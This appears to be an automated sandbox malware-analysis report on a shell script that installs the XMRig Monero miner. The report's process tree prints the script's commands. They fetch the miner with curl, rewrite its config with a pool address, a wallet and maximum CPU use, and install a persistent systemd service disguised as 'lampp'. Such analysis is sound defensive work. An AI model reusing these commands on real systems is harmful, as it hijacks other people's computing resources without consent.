Analysis
-
max time kernel
1s -
max time network
1045s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
-
submitted
01/07/2024, 11:30 UTC
General
-
Target
script.sh
-
Size
8KB
-
MD5
97423634cc1762b2f010cb860e7fb47d
-
SHA1
2f50775e8fe9ab98a80f06d835c5874091bf0b3e
-
SHA256
d97530313d2423ba8c3e87ccd3d66e6cd77997d26bbb4d1dd2a5f32827dde8cd
-
SHA512
bd5279178f713edaca1754937a859fa41dbec1fdd15c8ad3cb11894142e389d97bf3ca7f0402c018a616053b1121650ed609498a4b34c4def829e02924f6de1f
-
SSDEEP
192:fFa1ZIJvH8czpCyzdpB3f1SAij8E3YUNvmTC8KfbmP/oYv0Yd:fEHexC+HSAHE3YUN+TC8SbmQUfd
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Executes dropped EXE 1 IoCs
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 45 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 24 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 2 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/script.sh/tmp/script.sh1⤵
- Writes file to tmp directory
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/usr/bin/nprocnproc2⤵
-
-
/usr/bin/bcbc -l2⤵
-
-
/usr/bin/curlcurl -L --progress-bar https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.tar.gz -o /tmp/xmrig.tar.gz2⤵
- Writes file to tmp directory
-
-
/usr/bin/mkdirmkdir /root/lampp2⤵
-
-
/usr/bin/tartar xf /tmp/xmrig.tar.gz -C /root/lampp2⤵
-
/usr/local/sbin/gzipgzip -d3⤵
-
-
/usr/local/bin/gzipgzip -d3⤵
-
-
/usr/sbin/gzipgzip -d3⤵
-
-
/usr/bin/gzipgzip -d3⤵
-
-
-
/usr/bin/rmrm /tmp/xmrig.tar.gz2⤵
-
-
/usr/bin/sedsed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /root/lampp/config.json2⤵
- Reads runtime system information
-
-
/root/lampp/xmrig/root/lampp/xmrig --help2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/usr/bin/hostnamehostname2⤵
-
-
/usr/bin/sedsed -r "s/[^a-zA-Z0-9\\-]+/_/g"2⤵
-
-
/usr/bin/cutcut -f1 -d.2⤵
-
-
/usr/bin/sedsed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"gulf.moneroocean.stream:10001\",/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"47zZneDdPNr63HM9ubMyrhYvLNbDunCkiia6fNCvQkThNuK6rrj59e3Y2nNF3ETeewbALAGYaiti4SF4ENwJ8bR7PKXXcMN\",/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu2204-amd64-20240611-en-4\",/" /root/lampp/config.json2⤵
- Reads runtime system information
-
-
/usr/bin/sedsed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 100,/" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s#\"log-file\": *null,#\"log-file\": \"/root/lampp/xmrig.log\",#" /root/lampp/config.json2⤵
-
-
/usr/bin/sedsed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /root/lampp/config.json2⤵
-
-
/usr/bin/cpcp /root/lampp/config.json /root/lampp/config_background.json2⤵
-
-
/usr/bin/sedsed -i "s/\"background\": *false,/\"background\": true,/" /root/lampp/config_background.json2⤵
-
-
/usr/bin/catcat2⤵
-
-
/usr/bin/chmodchmod +x /root/lampp/miner.sh2⤵
-
-
/usr/bin/sudosudo -n true2⤵
- Reads runtime system information
-
/usr/bin/truetrue3⤵
-
-
-
/usr/bin/awkawk "{print \$2}"2⤵
-
-
/usr/bin/grepgrep MemTotal /proc/meminfo2⤵
-
-
/usr/bin/catcat2⤵
-
-
/usr/bin/sudosudo mv /tmp/lampp.service /etc/systemd/system/lampp.service2⤵
-
/usr/bin/mvmv /tmp/lampp.service /etc/systemd/system/lampp.service3⤵
-
-
-
/usr/bin/sudosudo killall xmrig2⤵
- Reads runtime system information
-
/usr/bin/killallkillall xmrig3⤵
- Reads runtime system information
-
-
-
/usr/bin/sudosudo systemctl daemon-reload2⤵
-
/usr/bin/systemctlsystemctl daemon-reload3⤵
-
-
-
/usr/bin/sudosudo systemctl enable lampp.service2⤵
- Reads runtime system information
-
/usr/bin/systemctlsystemctl enable lampp.service3⤵
-
-
-
/usr/bin/sudosudo systemctl start lampp.service2⤵
- Reads runtime system information
-
/usr/bin/systemctlsystemctl start lampp.service3⤵
- Reads runtime system information
-
-
Network
-
DNSraw.githubusercontent.comRemote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.108.133raw.githubusercontent.comIN A185.199.109.133 -
DNSraw.githubusercontent.comRemote address:8.8.8.8:53Requestraw.githubusercontent.comIN AAAAResponseraw.githubusercontent.comIN AAAA2606:50c0:8003::154raw.githubusercontent.comIN AAAA2606:50c0:8001::154raw.githubusercontent.comIN AAAA2606:50c0:8002::154raw.githubusercontent.comIN AAAA2606:50c0:8000::154
-
DNSgulf.moneroocean.streamRemote address:8.8.8.8:53Requestgulf.moneroocean.streamIN AResponsegulf.moneroocean.streamIN CNAMEmonerooceans.streammonerooceans.streamIN A149.102.143.109
-
DNSgulf.moneroocean.streamRemote address:8.8.8.8:53Requestgulf.moneroocean.streamIN AAAAResponsegulf.moneroocean.streamIN CNAMEmonerooceans.streammonerooceans.streamIN AAAA2a02:c206:2169:904::1
-
185.199.111.133:443raw.githubusercontent.comtls
-
149.102.143.109:10001gulf.moneroocean.stream
-
224.0.0.251:5353 -
8.8.8.8:53raw.githubusercontent.comdns
DNS Request
raw.githubusercontent.com
DNS Response
185.199.111.133185.199.110.133185.199.108.133185.199.109.133
-
8.8.8.8:53raw.githubusercontent.comdns
DNS Request
raw.githubusercontent.com
DNS Response
2606:50c0:8003::1542606:50c0:8001::1542606:50c0:8002::1542606:50c0:8000::154
-
8.8.8.8:53gulf.moneroocean.streamdns
DNS Request
gulf.moneroocean.stream
DNS Response
149.102.143.109
-
8.8.8.8:53gulf.moneroocean.streamdns
DNS Request
gulf.moneroocean.stream
DNS Response
2a02:c206:2169:904::1
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5f3294129e6b76283965ad86a815bf383
SHA15fe0ab538f86962efe82cb13fc2da745610740af
SHA256578386126ae451940ff5c21ce95b4e3be85c2d33160d6e739ed0ebbd206c7e81
SHA51207a280be17282096ed8c319623d2e02e088e80d69e3d6d24ecaef5bedf624d006dc4963b8b1a6c0569a3c9221786bfd7cd462dddebcfcbed7879fd994b4c8333
-
Filesize
253B
MD5f96a321a262287ceae164f23f232ed9c
SHA1d1eeab41f244b42377afd7cc3de7428736162b24
SHA256f572e87f0fc93c5a62023a572cf4c797c942d7618167752779854d6f73efa012
SHA51275fc451b1f3138dbecd907ba5af2246884582190f85b4f574a99696439a3d6839c34a9310d21d206148870c7e6e7604a7ebd8bbd23406c57c6c6346fcb9cc86e
-
Filesize
2KB
MD5e97075d2441e00ab423b2b9be5b777eb
SHA112fc9d7ac7c4964bac28d5fbf7494161df7e9172
SHA256e07a8c34217ef9c5361a9e114551f5e21378a1081c798dc6cd88fa81b3bf673e
SHA512712ad83f969992caeb27539f4e9d22d2433311a5814ee991f538eb6016985bca966415c6a7184b5123d3b5203fdff58cc90e061ba478f4d83b903747171cb8a8
-
Filesize
2KB
MD58b11b027dd187104473ee7d661ffe25f
SHA1ec46117e3b0c2ce9f7fe60ac51eb1861c49e97ef
SHA256984513d85c8a81fbca982bd8c81a73344f39a4fe46bd9b982ed85c0ff6d1030f
SHA5121078b6b53897534be9f070454b8545f8075017025f9252175cfc6651c7eb11a906230558daa22a1086790f5fd5fed43b9b1909b044c70fafae9aba2d99381ea2
-
Filesize
2KB
MD5e4fa71467c51cf7a87b327689e5853e6
SHA1cb098c7b478ec86b951e5898b5164ead191cf52e
SHA2568829c674574337b830e6ac828ec403f655808e947eae32705c392744e9080e60
SHA512ab71614c1da31bb4591d34d5bd97a4d6fff96cc297cf62f3ec23b237b82a41d0cec6101b476ae6b55d7f8d1114eb3815f29bc7f86f4976bcf0e657c0d072c59f
-
Filesize
2KB
MD515616bc8e5bc9e3daf7472ea12574c82
SHA1339ce7fd66e0ef9c077a7ed3c4e294fb438dbf8c
SHA256c86a81571abac0433ba0b105e91c06c359b36f44cd019338529fa8fd57ff406e
SHA512f60c707623933c9b5b369e7f05fbd2cb353503a8961de9bda819eeb6276a3617e8ca8126f4951240af7c468b35c3b5795b734fb15c713ac07333abe6b9441507
-
Filesize
2KB
MD523d9f1929c1a9251ae20fad667d6a2cf
SHA14e789d89088f3f340b70e330be60973735ba4c7b
SHA25611ddb2e5abc95516a2e0b0fd9e55766d33812f46225ea45efb2c212e12b13d6b
SHA5128f22b33052d05cccd42cb89ef22e917e387261c02828fe8e8796b30c8bf7124565932461a78299f96f02e8fa902cf9f1f96cc56298d53970e239c7bb77b36125
-
Filesize
2KB
MD5d489ddbbb83271e967b8af615d17d3c7
SHA1f0394a367a60e9727269882154098dec802774ef
SHA2565cf89bb7fbef53cc5fbe582017145aa148ad8a8abc5bceee9f887ba4a6fcc46e
SHA512aba9bf29076f1d5b6e81c83e5be1cee5934d23db9093ec3ea8b4d92b521e37e58d80aaea6248dc211544574f3772df990950b9236f40e863a76220f86b157954
-
Filesize
8.4MB
MD5e6b2f9d13d45c128b44cb5405df9ab39
SHA1c07326f69240e3d22d134d156528af3bd5d0497b
SHA25696462c80ee4118a9140b159d5bbf5f3a40a8693d650919e29b23bd3c9c7e4162
SHA5124eef70930aae075d38a871c380b2d1322c5a3cfdfdd6e936447e384bfd6c3f71b4ad7a9dc1dd2213a946f32681686f0db0b6f6e1caf1286a0a7fe36a26ac5632
-
Filesize
177B
MD5540c899b78585827e807a62f7345eaf5
SHA18bf3146889c6b15811f226bff9fbca24d184eff2
SHA256b32af10b7911d7113a1fe52ef467e7f123fb26552cae752ba52aef684b301fcf
SHA5120aac2aced9505d1bde7d6c2fb6166a341982e9a170e7f0f72ede35c1305c4519e2fb07a7658558b41ad319c3d102f07d667a8769ff659b6392c81698d278af46
-
Filesize
3.4MB
MD5e003a3ec8bdd61151a61cadf950502c4
SHA12606bd45a8d45092c7d2c0ac9d6e92ec7ef7950e
SHA25680b1dc6f56a95273420dc96e837d7e1a9f42c057e319dadac0cccee4425319e0
SHA512ef80c71d8b0d09128abf9e67fe12a8cd843500419da43e7a284e016029391d826c503aeec3073a2b3d7d90ba24f18990edf6965cd38a270bbe57f20c6be022f9